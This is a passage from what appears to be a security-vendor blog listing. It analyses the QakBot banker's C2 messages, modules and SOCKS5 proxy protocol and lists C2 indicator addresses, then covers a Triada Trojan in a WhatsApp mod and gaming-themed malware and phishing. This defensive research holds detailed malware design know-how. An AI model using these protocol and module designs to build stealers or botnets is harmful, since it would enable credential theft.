    • WMI Query ROOT\CIMV2:Win32_PhysicalMemory
    • WMI Query ROOT\CIMV2:Win32_Product
    • WMI Query ROOT\CIMV2:Win32_PnPEntity

‘SYSTEM INFO’ message

  • ‘ASK for COMMAND’ message – bot command request message to C2. After the ‘SYSTEM INFO’ message is sent, the bot starts asking the C2 for a command to execute. One of the main fields is “14” – the SALT. This field is unique and changes in every request. It is used to protect against hijacking or takeover of a bot. After receiving this request, the С2 uses the SALT in the signing procedure and places the signature in the response, so the bot can check the signed data. Only a valid and signed command will be executed.

‘ASK for COMMAND’ message

  • ‘COMMAND’ message – C2 response message with command to execute. The current version of the bot supports 24 commands, most of them related to download, execution, drop of additional modules and module configuration files with different options, or setup/update configuration values.
    This type of message contains the signed value of the SALT (obtained from the bot’s request field “14”), COMMAND ID and MODULE ID. The other values of the message are not signed.In previous versions, the bot received modules and commands immediately after infection and sending a ‘SYSTEM INFO’ message. Now, the C2 responds with an empty command for about an hour. Only after that will the C2 send commands and modules in the response. We believe that this time delay is used to make it difficult to receive and analyze new commands and modules in an isolated controlled environment.

‘COMMAND’ C2 response with empty command

If the C2 pushes some modules, the Base64-encoded binary is placed into field “20” of the message.

‘COMMAND’ C2 response with additional module to load

  • ‘STOLEN INFO’ message – bot message to C2 with stolen information like passwords, accounts, emails, etc. Stolen information is RC4 encrypted and Base64 encoded. The key for the RC4 encryption is generated in a different way and based on the infected system ID (aka Bot ID) values, and not based on a static string as in the case of traffic encryption.

‘STOLEN INFO’ message

Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations.

The additional modules differ from sample to sample and may include: ‘Cookie grabber’, ‘Email Collector’, ‘Credentials grabber’, and ‘Proxy module’ among others.

These modules may be written by the threat actors themselves or may be borrowed from third-party repositories and adapted. It can vary from sample to sample. For example, there are older samples that may use Mimikatz for credentials dumping.

Below are some of the modules that we found during our research.

Additional modules
  • Cookie Grabber – collects cookies from popular browsers (Edge, Firefox, Chrome, Internet Explorer).

  • Hidden VNC – allows threat actors to connect to the infected machine and interact with it without the real user knowing.

  • Email Collector – tries to find Microsoft Outlook on the infected machine, then iterates over the software folders and recursively collects emails. Finally, the module exfiltrates the collected emails to the remote server.

The threat actors distributed a debug version of the email collector module at some point

  • Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code.

The module contains a ciphered list of DLLs and functions that the bot will hook

  • Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms.

Procedure that collects passwords from different sources

  • Proxy module – tries to determine which ports are available to listen to using the UPnP port forwarding and tier 2 С2 query. Comparing current and old proxy loader versions revealed some interesting things: the threat actors decided to remove the cURL dependency from the binary and perform all HTTP communications using their own code. Besides removing cURL, they also removed OpenSSL dependencies and embedded all functions into a single executable – there are no more proxy loaders or proxy modules, it’s a single file now.

UPnP port forwarding query construction

After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received/transmitted one by one or in multiple packets in a single TCP data segment (streamed).

The usual proxy module execution flow is as follows:

  1. Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data.
  2. Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file.
  3. Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager.

Communicating with the external PROXY-C2:

  1. Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started.
  2. Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2.
  3. Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10).
  4. Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol.

QakBot proxy commands are as follows:

Command Description 1 Hello (bot->C2) 10 Set up auth credentials (C2->bot) 11 Confirm credentials setup (bot->C2) 2 Create new proxy session (C2->bot) 3 SOCKS5 AUTH (bot->C2) 4 SOCKS5 requests processing (works for both sides) 5 Close session (works for both sides) 6 Update session state/session state updated notification (works for both sides) 7 Update session state/session state updated notification (works for both sides) 8 PING (C2->bot) 9 PONG (bot->C2) 19 Save current time in registry (C2->bot)

Parsed packets from C2

Tracking single proxy

  • Web inject – the configuration file for the hooking module
    Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim’s traffic by injecting the module into the browser’s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page.

Fragment of JavaScript injected into the source page of the Wells Fargo login page

QakBot statistics

We analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% compared to the previous year and reached 17,316.

Number of users affected by QakBot attacks from January to July in 2020 and 2021 (download)

We observed the largest campaigns in Q1 2021 when 12,704 users encountered QakBot, with 8,068 Kaspersky users being targeted in January and 4,007 in February.


QakBot is a known Trojan-Banker whose techniques may vary from binary to binary (older and newer versions). It has been active for over a decade and doesn’t look like going away anytime soon. The malware is continuously receiving updates and the threat actors keep adding new capabilities and updating its modules in order to steal information and maximize revenue.

We know that threat actors change how they perform their malicious activities based on security vendor activities, using sophisticated techniques to stay under the radar. Although QakBot uses different techniques to avoid detection, for example, process enumeration in order to find running anti-malware solutions, our products are able to detect the threat using behavior analysis. The verdicts usually assigned to this malware:


Indicators of compromise (C2 server addresses) 75.67.192[.]125:443 24.179.77[.]236:443 70.163.161[.]79:443 72.240.200[.]181:2222 184.185.103[.]157:443 78.63.226[.]32:443 83.196.56[.]65:2222 95.77.223[.]148:443 76.168.147[.]166:993 105.198.236[.]99:443 73.151.236[.]31:443 64.121.114[.]87:443 213.122.113[.]120:443 97.69.160[.]4:2222 77.27.207[.]217:995 105.198.236[.]101:443 75.188.35[.]168:443 31.4.242[.]233:995 144.139.47[.]206:443 173.21.10[.]71:2222 125.62.192[.]220:443 83.110.109[.]155:2222 76.25.142[.]196:443 195.12.154[.]8:443 186.144.33[.]73:443 67.165.206[.]193:993 96.21.251[.]127:2222 149.28.98[.]196:2222 222.153.122[.]173:995 71.199.192[.]62:443 45.77.117[.]108:2222 45.46.53[.]140:2222 70.168.130[.]172:995 45.32.211[.]207:995 71.74.12[.]34:443 82.12.157[.]95:995 149.28.98[.]196:995 50.29.166[.]232:995 209.210.187[.]52:995 149.28.99[.]97:443 109.12.111[.]14:443 209.210.187[.]52:443 207.246.77[.]75:8443 68.186.192[.]69:443 67.6.12[.]4:443 149.28.99[.]97:2222 188.27.179[.]172:443 189.222.59[.]177:443 149.28.101[.]90:443 98.192.185[.]86:443 174.104.22[.]30:443 149.28.99[.]97:995 189.210.115[.]207:443 142.117.191[.]18:2222 149.28.101[.]90:8443 68.204.7[.]158:443 189.146.183[.]105:443 92.59.35[.]196:2222 75.137.47[.]174:443 213.60.147[.]140:443 45.63.107[.]192:995 24.229.150[.]54:995 196.221.207[.]137:995 45.63.107[.]192:443 86.220.60[.]247:2222 108.46.145[.]30:443 45.32.211[.]207:8443 193.248.221[.]184:2222 187.250.238[.]164:995 197.45.110[.]165:995 151.205.102[.]42:443 2.7.116[.]188:2222 45.32.211[.]207:2222 71.41.184[.]10:3389 195.43.173[.]70:443 96.253.46[.]210:443 24.55.112[.]61:443 106.250.150[.]98:443 172.78.59[.]180:443 24.139.72[.]117:443 45.67.231[.]247:443 90.65.234[.]26:2222 72.252.201[.]69:443 83.110.103[.]152:443 47.22.148[.]6:443 175.143.92[.]16:443 83.110.9[.]71:2222 149.28.101[.]90:995 100.2.20[.]137:443 78.97.207[.]104:443 207.246.77[.]75:2222 46.149.81[.]250:443 59.90.246[.]200:443 144.202.38[.]185:995 207.246.116[.]237:8443 80.227.5[.]69:443 45.77.115[.]208:995 207.246.116[.]237:995 125.63.101[.]62:443 149.28.101[.]90:2222 207.246.116[.]237:443 86.236.77[.]68:2222 45.32.211[.]207:443 207.246.116[.]237:2222 109.106.69[.]138:2222 149.28.98[.]196:443 45.63.107[.]192:2222 84.72.35[.]226:443 45.77.117[.]108:443 71.163.222[.]223:443 217.133.54[.]140:32100 144.202.38[.]185:2222 98.252.118[.]134:443 197.161.154[.]132:443 45.77.115[.]208:8443 96.37.113[.]36:993 89.137.211[.]239:995 45.77.115[.]208:443 27.223.92[.]142:995 74.222.204[.]82:995 207.246.77[.]75:995 24.152.219[.]253:995 122.148.156[.]131:995 45.77.117[.]108:8443 24.95.61[.]62:443 156.223.110[.]23:443 45.77.117[.]108:995 96.61.23[.]88:995 144.139.166[.]18:443 45.77.115[.]208:2222 92.96.3[.]180:2078 202.185.166[.]181:443 144.202.38[.]185:443 71.187.170[.]235:443 76.94.200[.]148:995 207.246.77[.]75:443 50.244.112[.]106:443 71.63.120[.]101:443 140.82.49[.]12:443 24.122.166[.]173:443 196.151.252[.]84:443 81.214.126[.]173:2222 73.25.124[.]140:2222 202.188.138[.]162:443 216.201.162[.]158:443 47.196.213[.]73:443 74.68.144[.]202:443 136.232.34[.]70:443 186.154.175[.]13:443 69.58.147[.]82:2078

* Can be performed as an external command (extended module).

2021. augusztus 24.

Triada Trojan in WhatsApp MOD

WhatsApp users sometimes feel the official app is lacking a useful feature of one sort or another, be it animated themes, self-destructing messages which automatically delete themselves, the option of hiding certain conversations from the main list, automatic translation of messages, or the option of viewing messages that have been deleted by the sender. This is where amateurs step in with modified versions of WhatsApp which offer extra features. These mods can contain ads, usually in the form of various different banners displayed in the app. However, we discovered that the Trojan Triada snook into one of these modified versions of the messenger called FMWhatsapp 16.80.0 together with the advertising software development kit (SDK). This is similar to what happened with APKPure, where the only malicious code that was embedded in the app was a payload downloader.

Trojan loaded from advertising SDK

We detect the Trojan modification as Trojan.AndroidOS.Triada.ef.

How Triada operates

Once the app is launched, the malware gathers unique device identifiers (Device IDs, Subscriber IDs, MAC addresses) and the name of the app package where they’re deployed. The information they collect is sent to a remote server to register the device. It responds by sending a link to a payload which the Trojan downloads, decrypts and launches.

Decrypting and launching a malicious payload

By analyzing the statistics on files downloaded by FMWhatsapp, we identified a number of different types of malware:

The MobOk Trojan opens the subscription page in an invisible window to click “subscribe” while posing as the user…

…and intercepts the confirmation code to confirm the subscription

  • Trojan.AndroidOS.Subscriber.l (MD5: c3c84173a179fbd40ef9ae325a1efa15) also serves to sign victims up for premium subscriptions.
  • Trojan.AndroidOS.Whatreg.b (MD5: 4020a94de83b273f313468a1fc34f94d) signs in Whatsapp accounts on the victim’s phone. The malware gathers information about the user’s device and mobile operator, then sends it to the command and control server (C&C server). The server responds with an address to request a confirmation code and other information required to sign in. The attackers seem to have done their homework on the protocol WhatsApp uses.

Obtaining information for signing in

Once the necessary IDs have been collected, the malware requests a verification code.

Requesting an SMS confirmation code

It’s worth highlighting that FMWhatsapp users grant the app permission to read their SMS messages, which means that the Trojan and all the further malicious modules it loads also gain access to them. This allows attackers to automatically sign the victim up for premium subscriptions, even if a confirmation code is required to complete the process.

We don’t recommend using unofficial modifications of apps, especially WhatsApp mods. You may well end up with an unwanted paid subscription, or even loose control of your account altogether, which attackers can hijack to use for their own purposes, such as spreading spam sent in your name.



Trojan.AndroidOS.Triada.ef b1aa5d5bf39fee0b1e201d835e4dc8de


2021. augusztus 23.

Gaming-related cyberthreats in 2020 and 2021

The video game industry is soaring, not in the least thanks to the lockdowns, which forced people to look for new ways to entertain themselves and socialize. Even with things going back to normal, gaming is expected to have a very bright future. Newzoo estimates the industry to gross 175.8 billion USD in 2021, which is slightly less than the total revenue in 2020 but still significantly above the pre-pandemic figures.

This rapid growth owes a lot to the surge in mobile gaming and focus on social interaction during the pandemic. With 2.7 billion gamers worldwide, virtual worlds offer not just an opportunity to unwind, but to connect with people from every part of the globe. Additionally, the number of gamers will continue to rise.

Mobile games especially draw ever more users. Analysts predict that mobile gaming will account for $90.7 billion to $120 billion of the revenue in 2021, which is more than half of the estimated gaming industry value. Last year’s lockdowns gave a boost to the mobile market, with users downloading thirty percent more mobile games per week in Q1 2021 than in Q4 2019 globally, reaching over one billion weekly downloads. Global consumer spending on mobile games reached $44.7 billion in the first half of 2021.

With the growth of the gaming industry being this rapid, we as cybersecurity researchers ask ourselves what this means for user security. Earlier in 2021, we looked at the dynamics of gaming-related web attacks over the course of the pandemic, identifying an increase in that sector.

To get a better grasp of the threat landscape that gamers are faced with, we decided to take a closer look at other gaming-related cyberthreats. In this report, we cover PC and mobile threats as well as various phishing schemes that capitalize on popular games.


To measure the level of the cybersecurity risk associated with gaming, we investigated several types of threats. We examined malware and unwanted software disguised as popular PC and mobile games. We also looked in greater detail at some of the strains of malware being distributed and the dangers they pose for users. Additionally, we checked our database for gaming-related spam campaigns and phishing schemes that are used in the wild.

This report contains threat statistics obtained from Kaspersky Security Network, which processes anonymized cybersecurity data voluntarily provided by users of Kaspersky products. These statistics indicate how often and how many users of our products have encountered gaming-related cyberthreats during the reporting period.

Most of the statistics presented in the report were collected between July 1, 2020 and June 30, 2021. Pandemic-related statistics cover the period of January 2020 through June 2021.

As a result, we discovered the following:

  • The total number of users who encountered gaming-related malware and unwanted software from July 1, 2020 through June 30, 2021 was 303,827, with 69,244 files distributed under the guise of twenty-four most-played PC games;
  • Quarterly dynamics showed that the number of users affected by PC-specific gaming-related cyberthreats rose at the beginning of the pandemic but then dropped in Q1-Q2 2021 compared to Q1-Q2 2020 as the lockdowns forced more users to search for free games. Meanwhile, mobile games show a different trend, with the number of users affected growing by 185% at the beginning of the pandemic and declining by just 10% by Q2 2021, meaning that mobile threats were still actively employed by cybercriminals.
  • The top five PC games used as bait in the attacks targeting the largest number of users are Minecraft, The Sims 4, PUBG, Fortnite and Grand Theft Auto V.
  • We uncovered a massive, coordinated campaign that distributed Swarez Dropper via numerous warez sites that were SEO-optimized. Gathering secrets from browsers, crypto wallets and other applications, this malware affected users in forty-five countries.
  • The top three mobile games most often used as bait were Minecraft, PUBG Mobile and Among Us.
  • A total of 50,644 users attempted to download 10,488 unique files disguised as the ten most-played mobile games, generating a total of 332,570 detections in July 2020 through June 2021.
  • Most threats uncovered on PC and mobile devices were adware, but dangerous malware was also present: from stealers to bankers, often leading to the loss of not just credentials but money, including cryptocurrency.
  • Gaming-themed phishing schemes are highly versatile and with more gaming events taking place, cybercriminals are expanding scenarios in which they attempt to extract user data.
Cyberthreats for PC gamers

To assess the gaming-related threat landscape, we compiled four lists of the ten most-played PC games on online platforms like Origin or Steam and a list of platform-independent games, and removed duplicates along with titles that are too general for filtering out threats specific to a particular game. As a result, we ended up with twenty-four popular PC games.

1.         Apex Legends

2.         Battlefield V

3.         Chivalry 2

4.         Counter-Strike: Global Offensive

5.         Dota 2

6.         FIFA 21

7.         Fortnite

8.         Grand Theft Auto V

9.         Minecraft

10.       NBA 2K21

  11.       Need for Speed Heat


13.       Rocket League

14.       Rogue Company

15.       Star Wars Battlefront

16.       Team Fortress 2

17.       The Sims 4

18.       Titanfall 2

19.       Unravel Two

20.       Valheim 21.       League of Legends

22.       Battlefield 1

23.       Warframe

24.       Tom Clancy’s Rainbow Six Siege


TOP 24 PC games analyzed in this report

We used the titles of the games as keywords and ran these against our telemetry to determine the scale of distribution of malicious files and unwanted software under the guise of these games, as well as the number of users attacked by these files.

Over the course of the last year, from July 2020 through June 2021, 69,244 files were distributed under the names of popular games, with 303,827 users encountering these files globally. In total, Kaspersky solutions detected 5,846,032 attacks involving these files during the reporting period.

By using the number of users who unwittingly attempted to download malware and unwanted software in hopes of having fun gaming, we also compiled a list of the ten most popular games used as a coverup for malware and unwanted software. The rankings largely correlate with those for distributed files and associated detections, with nine games in the top ten being the same in all rankings.

Minecraft took the first place with 36,336 distributed files affecting 184,887 users and resulting in 3,010,891 attempted infections detected over the course of July 2020 through June 2021. Other games that affected the largest numbers of users were The Sims 4, PUBG, Fortnite and Grand Theft Auto V. Notably, the number of unique users that tried to download Minecraft exceeded the number of users affected by the rest of the top ten games combined by more than 40%. Furthermore, 250% more files were disguised as Minecraft than PUBG, the game that follows Minecraft in file distribution.

This overwhelming popularity of Minecraft may be explained by the fact that there are multiple versions and a myriad of mods: modifications that can be installed on top of the core game to diversify gameplay. Mods are created by users and are unofficial, so they provide a convenient disguise for malicious payloads or unwanted software.

  Game title Users affected 1 Minecraft 184887 2 The Sims 4 43252 3 PUBG 26724 4 Fortnite 14702 5 Grand Theft Auto V 14261 6 Counter-Strike Global Offensive 13625 7 Rocket League 4631 8 League of Legends 4166 9 FIFA 21 3109 10 Need for Speed Heat 2069

 TOP 10 games used as a lure for distribution of malware and unwanted software, by attacked users, July 1, 2020 through June 30, 2021

  Game title Files 1 Minecraft 36336 2 PUBG 10360 3 Fortnite 6109 4 The Sims 4 5844 5 Grand Theft Auto V 4953 6 League of Legends 3794 7 Counter-Strike Global Offensive 2281 8 FIFA 21 2138 9 NBA 2K21 1045 10 Rocket League 987

TOP 10 games used as a lure for distribution of malware and unwanted software, by the number of files, July 1, 2020 through June 30, 2021

  Game title Detections 1 Minecraft 3010891 2 The Sims 4 1266804 3 PUBG 484528 4 Counter-Strike Global Offensive 327976 5 Fortnite 267598 6 Grand Theft Auto V 187114 7 League of Legends 56710 8 Rocket League 37751 9 Need for Speed Heat 27786 10 Dota 2 22175

TOP 10 games used as a lure for distribution of malware and unwanted software, by detected attacks, July 1, 2020 through June 30, 2021

Geography of PC gaming-related cyberthreats by number of attaks per 1000 users in the country, July 1, 2020 through June 30, 2021 (download)

Gaming malware home delivered

We also looked at the dynamics of gaming-related cyberthreat distribution over the past year and a half to see whether the pandemic had an effect. In Q2 2020, when many countries went on lockdown, the number of detections of malware and unwanted software disguised as PC games skyrocketed, reaching 2,481,915 and affecting 165,207 users worldwide. In Q2 2021 by comparison, the number of detections was just 636,904, and the number of affected users was 53,439, reflecting a drop of 3.8 and three times, respectively. This suggests that as the lockdown measures were being cancelled and restrictions worldwide were relaxed in Q2 2021, the number of users looking for PC games and mods decreased significantly.

Users attempting to download malicious or unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

Attempts to download malicious or unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

On the contrary, the number of unwanted and malicious software distributed under the guise of games has been decreasing steadily from quarter to quarter even as the number of attacked users grew, dropping by two times from 40,340 files in Q1 2020 to 19,960 files in Q1 2021. The same trend is clear in Q2 2020 versus Q2 2021.

The number of malicious and unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

Hello! Is the gamer home? Threats disguised as games

The types of malware and unwanted software distributed under the guise of games are somewhat unsurprising and reflect the overall trends in files distributed as illegal or cracked software. The statistics show downloaders accounted for an overwhelming majority (87.24%) of the software being spread. While this type of software is not malicious in itself, downloaders are often used to load other threats onto devices. Another common type of software spread as games is adware, which shows illicit advertising against users’ wish.

Other threats distributed under the titles of popular games include various Trojans, such as Trojan-Droppers and Trojan-Downloaders.

Threat Infection cases, % not-a-virus:Downloader 87.24 not-a-virus:AdWare 7.34 Trojan 2 Trojan-Downloader 0.73 not-a-virus:WebToolbar 0.71 DangerousObject 0.49 not-a-virus:RiskTool 0.46 Hoax 0.22 Trojan-Dropper 0.19 Trojan-PSW 0.11

TOP 10 threats distributed worldwide under the guise of popular games, July 1, 2020 through June 30, 2021

Miners are worth mentioning among the threats to PC gamers. They were detected under various verdicts such as Trojans, RiskTools etc, accounting for 0.11% of all threats. Miners targeting gamers sounds logical, as gaming computers have greater processing power. Miners can often remain unnoticed for long periods of time, only giving themselves away through the amount of energy consumed by infected devices. One miner detected by our products mimicked a PUBG installer. As user launches the installation process of what they believe to be a popular game, the miner is installed and programmed to run automatically.

This self-extracting archive mimicking a PUBG installer contains an XMRig miner

Swapmy Swarez delivering a strelaer Trojan to gamers

In April 2021, we observed a massive, well-coordinated campaign distributing a dropper we dubbed “Swarez”, which loaded a stealer to victim machines. The dropper was delivered through dozens of fake warez websites: platforms that specialize in freely distributed copyrighted materials, considered a violation of copyright law.

We have observed a lot of similar websites providing malware under the guise of cracks for various software products, including anti-malware, photo or video editors and popular games. According to our telemetry, gamers in forty-five countries attempted to download this malicious software believing that it was a game.

1.    Among Us

2.    Battlefield 4

3.    Battlefield V

4.    Control

5.    Counter-Strike Global Offensive

6.    FIFA 21

7.    Fortnite

8.    Grand Theft Auto V

9.    Minecraft

10.  NBA 2K21

11.  Need for Speed Heat


13.  Rust

14.  The Sims 4

15. Titanfall 2

The list of games which the Swarez dropper used as cover

There are long lists of tags under each post, designed to place the target pages at the top of web search results. This approach resulted in some of the sites distributing malware ending up in the top three results of popular search engines.

A search for Minecraft crack keys offers websites handing out Swarez among the top results

When trying to download something from the site, a chain of redirects lands the user on a download page and finally, drops a ZIP archive containing another password-protected ZIP and a text file with the key to unpack that. After several stages, the main payload, a Taurus stealer with functionality to exfiltrate valuable data from browsers, crypto wallets and other applications, is decrypted and executed.

An example of a warez site page used for distributing Swarez

This downloaded malware emulates cracked software to trick users into installing it

During the first infection stage, the Swarez dropper executes an obfuscated CMD script that decrypts a legitimate AutoIt interpreter. Using that, the malware runs an AutoIt script, which is also obfuscated. After several checks that the file is not running in an emulated environment, it decrypts the payload with an RC4 algorithm. The resulting file is injected in a system process and executed in its context. That file is a Taurus Trojan, a paid stealer developed by the Predator cybercriminal group, which is rich in features, flexible and configurable. It is capable of stealing cookies, saved passwords and autofill data from browsers, stealing cryptowallet secrets, gathering information about the system, fetching .txt files from users’ desktops and even taking screenshots. All this information is then uploaded to C&C servers.

Cyberthreats for mobile gamers

To further understand the gaming-related cyberthreat landscape, we also looked at mobile games. Mobile games often attract a different audience and generally have very different gaming patterns – not in the least because cellphones can be carried around and mobile games often require less engagement than their PC counterparts. Furthermore, as mobile tech progresses, popular PC games are brought onto mobile platforms, too, and not unfrequently, the mobile versions are free to play.

Similar to the PC threats analysis, we selected the top ten mobile games in line with the compiled lists of top ten mobile games from a number of ranking platforms. Our telemetry showed that in the period from July 2020 through June, 2021, 50,644 users attempted to download 10,488 unique files disguised as these games, generating a total of 332,570 detections.

Minecraft was by far the most popular mobile game disguise for unwanted application distributors. As many as 3982 files titled as Minecraft mods were detected on devices of 44,335 users in July 2020 through June 2021, generating a total of 302,611 detections. We have written before about various threats that lurk behind the facade of this popular game. In 2020, we wrote about twenty applications on Google Play that disguised themselves as mods for Minecraft, and in 2021, we found even more of such apps. Most of these apps were useless from a user perspective and mostly pushed extremely intrusive advertising, with some essentially rendering the devices unusable. Minecraft is followed by Among Us (2755 users affected by 1887 files, 9616 detections in total) and the mobile version of PUBG (1534 users, 9084 detections of 1713 files).

Rankings of mobile game titles used as a cover-up for distributing unwanted applications, by unique users, July 2020 through June 2021 (download)

Game title Unique users Detections Unique files 1 Minecraft 44335 302611 3982 2 Among US 2755 9616 1887 3 PUBG Mobile 1534 9084 1714 4 Free Fire 1226 6065 1217 5 Brawl Stars 613 2025 881 6 Roblox 513 2120 603 7 Call of Duty (Mobile) 403 1358 543 8 Clash of Clans 170 511 212 9 Clash Royale 116 359 112 10 Genshin Impact 28 63 40 The pandemic and risks for mobile gaming

Similar to the dynamics of PC gaming-related cyberthreats, the number of users and detected attempts at infecting mobile devices soared with the beginning of the pandemic, growing by 185% from 1138 users in February 2020 to 3253 users in March 2020.

However, unlike the situation with PC threats, the number of users attempting to download malicious files and unwanted applications thinking it is a mobile game reached its highest levels not in the Q2 2020 when lockdowns had just been introduced, but in Q3, specifically in August 2020, when 6341 users tried to download apps that they thought were games, resulting in a total of 42,664 detections.

Furthermore, even though detections peaked in the summer of 2020, the number of users striving to unwind with their mobile phones did not drop significantly in 2021, showing just a 10% average drop in users attacked monthly in Q2 2020 versus Q2 2021.

Users affected by mobile gaming-related cyberthreats, January 2020 through June 2021 (download)

Detections of mobile gaming-related cyberthreats, January 2020 through June 2021 (download)

Let’s see what you got on your phone

An overwhelming majority (83%) of files distributed under the guise of mobile games are adware. In July 2020 through June 2021, we detected 8710 such files, which affected 48,492 users. While adware is not malicious, illicit advertisements decrease the quality of the user experience and put user data at risk. Furthermore, being highly intrusive, adware often renders mobile devices useless, as it constantly opens web pages, shows ads and drains the battery.

TOP 10 types of threats that went under the disguise of gaming-related categories, by the number of files, July 2020 – June 2021. Source: Kaspersky Security Network (download)

TOP 10 types of threats that went under the disguise of gaming-related categories, by the number of attacked users, July 2020 – June 2021. Source: Kaspersky Security Network (download)

Adware was followed by Trojans (8%), with 1035 users downloading this type of malware. Trojans can delete, block, modify or copy data, as well as disrupt the performance of devices and networks. Certain types of Trojans, such as Trojan-SMS, which drain users’ wallets by sending expensive messages, as well as bankers and stealers, particularly dangerous pieces of software that collect important data such as logins and passwords, were also distributed as games, albeit less commonly.

The top ten malware strains encountered by users searching for mobile games from July 2020 through June 2021 represented various adware families. The most common one was AdWare.AndroidOS.Fyben.a, encountered by as many as 33,693 users. Second, third and fourth, as well as seventh and tenth places belonged to members of the HiddenAd family.

Verdict Users AdWare.AndroidOS.Fyben.a 33693 AdWare.AndroidOS.HiddenAd.os 7077 AdWare.AndroidOS.HiddenAd.ri 650 AdWare.AndroidOS.HiddenAd.lu 652 AdWare.AndroidOS.MobiDash.bg 641 AdWare.AndroidOS.FakeAdBlocker.a 607 AdWare.AndroidOS.HiddenAd.mn 651 AdWare.AndroidOS.FakeAdBlocker.c 599 AdWare.AndroidOS.FakeAdBlocker.e 287 AdWare.AndroidOS.HiddenAd.tm 278

TOP 10 verdicts that represent gaming-related files, by the number of attacked mobile users, July 2020 through June 2021. Source: Kaspersky Security Network

Pick a hand: a game or an SMS Trojan?

We took a closer look at some of the threats that were distributed as popular mobile games, and which could cost a user dearly. One of the Trojans that our solutions detect as HEUR:Trojan.AndroidOS.Vesub.b disguises itself as the Brawl Stars and PUBG Mobile games. When launched, the application simulates the loading process, while in fact, it collects and sends information about the user’s device to the control server, receiving commands in response. After the user notices that the game is not starting and decides to exit, the app icon is hidden, but the work does not end there. The application continues to work in the background, receiving commands to subscribe, send text messages or display ads, including unexpected playback of videos on YouTube, application pages in Google Play and advertising pages in the browser.

This page offers to download PUBG Mobile, while in fact, all that the user is getting is unwanted software

A fake PUBG app takes its time to load, while gathering data from the user’s device

The Vesub Trojan sends an infected system’s data to a C&C server and receives command to enter a subscription

Among the distributed threats is also the well-known Triada Trojan, detected as HEUR:Trojan.AndroidOS.Triada.bu. It is capable of showing unwanted advertising, and downloading and installing apps without users’ consent. This Trojan is hidden within a modified version of Minecraft. The game itself does, in fact, work, so the unwitting user at least gets to play.

The Triada Trojan is programmed to display ads, and download and install apps without the user’s permission – all while the user gets to play a Minecraft mod

Another type of malware distributed under the guise of Minecraft is the dropper HEUR:Trojan-Dropper.AndroidOS.Hqwar.as, known for delivering banking Trojans. This app operates in a particularly covert way. Once active on the victim’s device, the app displays a message that it was installed with an error and offers to remove it. The user has no choice but to click “Delete”. The app then informs the user that it has been deleted, while in fact, only the icon of what is believed to be Minecraft is removed from the UI. The malware then drops Trojan-Banker.AndroidOS.Grapereh, capable of sending and receiving text messages, making phone calls, and sending USSD commands.

Once installed, the fake Minecraft app notifies the user about an installation error and requests deletion, which never actually happens

The phishy games we play

In the previous sections of the report, we discussed malware and unwanted software disguised as popular games. However, there is another common threat: phishing. This is a form of cybercrime that relies on social engineering techniques by creating convincing replicas of pages of well-known brands or desirable products. Phishing is often used for luring users into giving up their data and cash. When it comes to devising attractive baits, phishers do their best, coming up with some creative scenarios that can fool unwitting users. Gaming is an especially lucrative topic for cybercrooks. Let us take a look at some of the schemes employed.

Free gold?

In the past few years, many popular games have introduced their own in-game currency that can be used for purchasing in-game goods, assets and upgrading characters. In-game currency is an additional way of monetizing games, while some users, quite expectedly, try to spend less on gaming.

Some phishers prey on this desire to reduce expenses and offer to generate in-game currency for free. We found examples of these schemes, targeting players of Apex Legends, FIFA21, Candy Crush, GTA5, Pokemon Go and PUBG. Of course, the pages do not actually deliver coins – only collect emails, usernames for specific games, gaming IDs, mobile phone and social media handles via so-called “human verification” surveys. These can later be used for additional targeting or sold in databases on the darknet.

Leave your username and ID and get nothing in return: that is how phishers roll

Free games, goodies and gift cards

A lot of phishing pages offer games for free or for a very small price: as low as 0.5 USD for a set of games. All they ask for is to share your social media handle or email and complete a couple of assignments. This data may be collected for further use. Also, if you pay even a very small amount of money on this kind of a site, your credit card details are very likely gone. The same is true when the site asks you to provide credit card details without charging any fee at all. Some pages offer free game downloads without any surveys or forms to fill. In this case, what you really download is most probably malware or adware.

This phishing page offers packages with 300 to 100 games for less than a dollar

A phishing page is offering a fake copy of The Sims 4 Cottage Living

Dota 2 bundles offered for free still require credit card details, which can later be found in databases on the dark web

Some phishers go so far as to mention that other software may include hidden malware, a good way of throwing the scent off

Letting off some Steam

Popular online gaming platforms, such as Steam, are also used as bait. Being careless may result in giving up your gaming credentials – and all what you have in your account together with those. That includes your games and the aforementioned in-game currency, too.

This phishing page may look convincing, but all it does is collecting Steam account details

The same goes for Twitch and Discord, communication platforms for the streaming and gaming communities. Phishers create pages branded after popular platforms and go after credentials and credit card details under the guise of giveaways and bargains.

This phishing page disguised as Discord will gather Discord account credentials

